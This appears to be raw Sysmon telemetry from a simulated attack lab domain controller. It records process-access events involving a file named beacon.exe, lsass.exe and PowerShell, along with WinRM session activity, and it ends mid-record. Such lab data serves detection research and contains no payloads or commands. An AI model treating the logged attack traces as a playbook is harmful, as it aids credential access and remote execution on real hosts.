10341000x80000000000000001697124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.990{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\kerberos.DLL+8cb5a|C:\Windows\system32\kerberos.DLL+42a18|C:\Windows\system32\kerberos.DLL+40fbb|C:\Windows\system32\kerberos.DLL+148cf|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001697526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.990{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 17141700x80000000000000001697525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:41.911{05ADC7E1-70ED-603D-7688-00000000AD01}8504\PSHost.132591129417803520.8504.DefaultAppDomain.wsmprovhostC:\Windows\system32\wsmprovhost.exe 23542300x80000000000000001697524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.896{05ADC7E1-70ED-603D-7688-00000000AD01}8504ATTACKRANGE\AdministratorC:\Windows\system32\wsmprovhost.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_srfkjkgn.2bl.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.896{05ADC7E1-70ED-603D-7688-00000000AD01}8504ATTACKRANGE\AdministratorC:\Windows\system32\wsmprovhost.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3lwhapfv.lp0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.874{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3lwhapfv.lp0.ps12021-03-01 22:55:41.874 10341000x80000000000000001697521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.873{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\kerberos.DLL+8cb5a|C:\Windows\system32\kerberos.DLL+42a18|C:\Windows\system32\kerberos.DLL+40fbb|C:\Windows\system32\kerberos.DLL+148cf|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001697520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.873{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001697519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.868{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.867{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.818{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A644A7455523542A6571E0FEA7BA1161,SHA256=21F5EFB8782FADED8DC290C26824AA0A730F981B05C6E0D58C322C6DCDD519B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.802{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.786{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\system32\wsmprovhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001697509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.780{05ADC7E1-70ED-603D-7688-00000000AD01}8504C:\Windows\System32\wsmprovhost.exe10.0.14393.4169 (rs1_release.210107-1130)Host process for WinRM plug-insMicrosoft® Windows® Operating SystemMicrosoft Corporationwsmprovhost.exeC:\Windows\system32\wsmprovhost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-70ED-603D-2919-000500000000}0x50019290HighMD5=7E0A8F058FDAD0D092BAC7E638131834,SHA256=BD3B152360DD02844CA61E2BB534D7BDB23580C8047537BDE49C547255B8F445,IMPHASH=F01729C7436ACEEA744AC48F9C4DC3A6{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001697508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.773{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.755{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7588-00000000AD01}2576C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.740{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-70ED-603D-7588-00000000AD01}2576C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 734700x80000000000000001697505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.724{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000001697504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 